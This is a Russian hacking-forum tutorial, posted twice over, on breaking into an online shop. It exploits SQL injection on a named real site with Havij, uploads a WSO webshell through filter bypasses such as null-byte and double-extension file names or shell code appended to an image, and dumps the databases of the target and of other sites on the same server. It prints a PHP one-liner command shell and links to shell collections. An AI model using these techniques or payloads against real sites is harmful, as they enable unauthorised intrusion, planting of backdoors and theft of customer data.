Один из примеров, как можно вскрыть шоп или любой другой сайт.
Взят самый простой пример, чтобы начинающие смогли понять что к чему.
Нам понадобится:
1. Шелл WSO (в архиве с видео);
2. Havij v 14
3. Браузер.
Видео разбито на 4 части:
1. Подготовка шелла;
2. Раскрутка SQL-inject при помощи Havij v 14;
3. Заливка шелла;
4. Дамп базы.
Дополнения к видео:
1. Подготовка шелла;
Существует немалое количесиво шеллов от разных авторов, написанных на разных языках, примеры: shell.php,shell.asp,shell.jsp.
B для каждого отдельного движка нужно подобрать свой шелл. Необязательно использовать только ВСО для php интерпритатора, можно использовать например: с100.php или с99.php. Стоит учитывать, что некоторые шеллы хорошо палятся антивирусами, поэтому не расстраивайтесь, если шелл залили, а по нужному адресу он отсутствует. Возможно его сразу удалил антивирус. Попробуйте залить другой шелл, если отсутствуют навыки программирования.
Большое количество разных шеллов:
Или гугл в помощь.
2. Раскрутка SQL-inject при помощи Havij v 14;
SQL-инекция примечательна и до сих пор не теряет своей актуальности тем, что при написании скрипта для движка, программер не ввел достаточной фильтрации символов. Что и дает нам возможность осуществлять склеенные запросы к базам данных. Вот, например,
в параметр Pid нам не нужно было подставлять никаких других значений, чтобы обойти фильтр. Havij сделал все сам. Но я часто сталкиваюсь с Blind sql inject. Там приходится самому манипулировать параметрами, например подставлять спец. символы, такие как #,$,\". а уже потом раскручивать через софт.
Сервис md5.rednoize.com в Havij v 14 на вкладке MD5 как подбирает хэш, так и шифрует слово/выражение в MD5. Т.е. работает в двухстороннем режиме.
Чтобы вникнуть в SQL инъекции полностью. Рекомендую ознакомиться здесь:
Прочтение тех статей позволит Вам понять суть и уже осмысленно анализировать скрипты на уязвимости даже в современных движках.
Также для новичков настоятельно советую скачать мануал на русском языке "SQL-injection от А до Я":
3. Заливка шелла;
В моем примере я не сталкнулся с частой проблемой по заливке шелла, а именно разного рода фильтрациями.
Но иногда Вам потребуется:
* Ситуация без изменения содержимого шелла переименовываем шелл, например:
* Заливаем картинку на сайт(в качестве аватара) и если имеется уязвимость типа php-including инклудим картинку и получаем шелл
* Открыть любую картинку hex редактором и в конце файла вставить код шелла
Сохранить и залить.
Такое еще встречается. Также есть способы по заливке шелла в комментариях картинки и др.
4. Дамп базы.
В моем примере права доступа на сервере настроены не привильно. Поэтому используя шелл, мы можем пройтись по другим сайтам на сервере и подключаться к их базам. Там еще есть шопы. Похожего типа.
Чтобы найти остальные сайты на сервере или определить домены на любом другом сервере, можно воспользоваться сервисом "Сайты на одном IP" сайта
Бывает, что функция дампа файла в шеллах не срабатывает, поэтому можно просто открыть таблицу для чтения и скопировать содержимое в буфер обмена, а потом вставить в блокнот на своем компьютере.
Статья написана sergaj специально для к.про
P.S. Не стесняйтесь задавать вопросы не только по примеру. Если ваш взлом имеет отношение к шеллам, SQL-инекциям, заливке шеллов или дампам баз, то задавайте. Т.к. это имеет непосредственное отношение к теме.
Архив upload.rar тестился на сайте:
ОТЧЕТ
Скрины отчета:
______________________________________________________________________________________________________________
_______________________________________________________________________________________________________________
_______________________________________________________________________________________________________________
Мысли Каспера на этот счет(баннеры-ссылки):
Мысли Мелкософта на этот же счет:
и ещё:
Каждый для себя сделает свой вывод.
Взят самый простой пример, чтобы начинающие смогли понять что к чему.
Нам понадобится:
1. Шелл WSO (в архиве с видео);
2. Havij v 14
Code:
чttp://www.itsecteam.com/en/projects/project1.htm
Видео разбито на 4 части:
1. Подготовка шелла;
Code:
http://www.sendspace.com/file/bfmc33
Code:
http://www.sendspace.com/file/f6oa1p
Code:
http://www.sendspace.com/file/ow3cpu
Code:
http://www.sendspace.com/file/lq0rvp
Дополнения к видео:
1. Подготовка шелла;
Существует немалое количесиво шеллов от разных авторов, написанных на разных языках, примеры: shell.php,shell.asp,shell.jsp.
B для каждого отдельного движка нужно подобрать свой шелл. Необязательно использовать только ВСО для php интерпритатора, можно использовать например: с100.php или с99.php. Стоит учитывать, что некоторые шеллы хорошо палятся антивирусами, поэтому не расстраивайтесь, если шелл залили, а по нужному адресу он отсутствует. Возможно его сразу удалил антивирус. Попробуйте залить другой шелл, если отсутствуют навыки программирования.
Большое количество разных шеллов:
Code:
чttp://forum.k0d.cc/showthread.php?t=3471&page=1
чttp://forum.hackzona.ru/forum-f17/eieeaeoey-oaeeia-t16848.html
2. Раскрутка SQL-inject при помощи Havij v 14;
SQL-инекция примечательна и до сих пор не теряет своей актуальности тем, что при написании скрипта для движка, программер не ввел достаточной фильтрации символов. Что и дает нам возможность осуществлять склеенные запросы к базам данных. Вот, например,
Code:
ttp://www.africantribalarts.net/pro_detail.php?Pid=128
Сервис md5.rednoize.com в Havij v 14 на вкладке MD5 как подбирает хэш, так и шифрует слово/выражение в MD5. Т.е. работает в двухстороннем режиме.
Чтобы вникнуть в SQL инъекции полностью. Рекомендую ознакомиться здесь:
Code:
чttp://injection.rulezz.ru/
Также для новичков настоятельно советую скачать мануал на русском языке "SQL-injection от А до Я":
Code:
http://www.sendspace.com/file/y139yl
3. Заливка шелла;
В моем примере я не сталкнулся с частой проблемой по заливке шелла, а именно разного рода фильтрациями.
Но иногда Вам потребуется:
* Ситуация без изменения содержимого шелла переименовываем шелл, например:
Code:
a) shell.php%00
б) shell.php.wmv
в) shell.php%00.jpg и др.
* Заливаем картинку на сайт(в качестве аватара) и если имеется уязвимость типа php-including инклудим картинку и получаем шелл
* Открыть любую картинку hex редактором и в конце файла вставить код шелла
Code:
<?php system($_GET["cmd"]); ?>
Такое еще встречается. Также есть способы по заливке шелла в комментариях картинки и др.
4. Дамп базы.
В моем примере права доступа на сервере настроены не привильно. Поэтому используя шелл, мы можем пройтись по другим сайтам на сервере и подключаться к их базам. Там еще есть шопы. Похожего типа.
Чтобы найти остальные сайты на сервере или определить домены на любом другом сервере, можно воспользоваться сервисом "Сайты на одном IP" сайта
Code:
чttp://www.2ip.ru/
Бывает, что функция дампа файла в шеллах не срабатывает, поэтому можно просто открыть таблицу для чтения и скопировать содержимое в буфер обмена, а потом вставить в блокнот на своем компьютере.
Статья написана sergaj специально для к.про
P.S. Не стесняйтесь задавать вопросы не только по примеру. Если ваш взлом имеет отношение к шеллам, SQL-инекциям, заливке шеллов или дампам баз, то задавайте. Т.к. это имеет непосредственное отношение к теме.
Архив upload.rar тестился на сайте:
![](http://www.virustotal.com/static/img/logo-small.png)
ОТЧЕТ
Code:
SHA256: 9b2bba5d4beac03e7bd8843df2e830a47decbf9167535e29b21012f49f51aeb9
File name: upload.rar
Detection ratio: 13 / 43
Analysis date: 2012-02-21 22:42:33 UTC ( 1 minute ago )
0
0
Antivirus Result Update
AhnLab-V3 - 20120221
AntiVir PHP/Shell.G.2 20120221
Antiy-AVL - 20120213
Avast PHP:Shell-AX [Trj] 20120221
AVG - 20120221
BitDefender Trojan.Php.Backdoor.APF 20120221
ByteHero - 20120221
CAT-QuickHeal - 20120221
ClamAV PHP.Shell-38 20120221
Commtouch - 20120221
Comodo - 20120221
DrWeb - 20120221
Emsisoft Backdoor.PHP.Shell!IK 20120221
eSafe - 20120221
eTrust-Vet - 20120221
F-Prot - 20120221
F-Secure Trojan.Php.Backdoor.APF 20120221
Fortinet - 20120221
GData Trojan.Php.Backdoor.APF 20120221
Ikarus Backdoor.PHP.Shell 20120221
Jiangmin Backdoor.PHP.aro 20120221
K7AntiVirus - 20120221
Kaspersky Backdoor.PHP.WebShell.ea 20120221
McAfee - 20120221
McAfee-GW-Edition - 20120221
Microsoft Backdoor:PHP/Shell.G 20120221
NOD32 PHP/WebShell.NAH 20120221
Norman - 20120221
nProtect Trojan.Php.Backdoor.APF 20120221
Panda - 20120221
PCTools - 20120221
Prevx - 20120221
Rising - 20120221
Sophos - 20120221
SUPERAntiSpyware - 20120206
Symantec - 20120221
TheHacker - 20120220
TrendMicro - 20120221
TrendMicro-HouseCal - 20120221
VBA32 - 20120221
VIPRE - 20120221
ViRobot - 20120221
VirusBuster - 20120221
Скрины отчета:
______________________________________________________________________________________________________________
![0fcd88bca96b.jpg](http://s50.radikal.ru/i130/1202/d2/0fcd88bca96b.jpg)
_______________________________________________________________________________________________________________
![2ea5e89fd323.jpg](http://s001.radikal.ru/i195/1202/d4/2ea5e89fd323.jpg)
_______________________________________________________________________________________________________________
![4dea29207e2a.jpg](http://s018.radikal.ru/i524/1202/05/4dea29207e2a.jpg)
Мысли Каспера на этот счет(баннеры-ссылки):
![](http://www.securelist.com/ru/images/newdesign3/logo_secur.gif)
Мысли Мелкософта на этот же счет:
![](http://www.microsoft.com/security/portal/Images/Malware-Shield_Banner-B.png)
и ещё:
![](http://i.microsoft.com/global/en-us/homepage/PublishingImages/sprites/microsoft_gray.png)
Каждый для себя сделает свой вывод.
Last edited: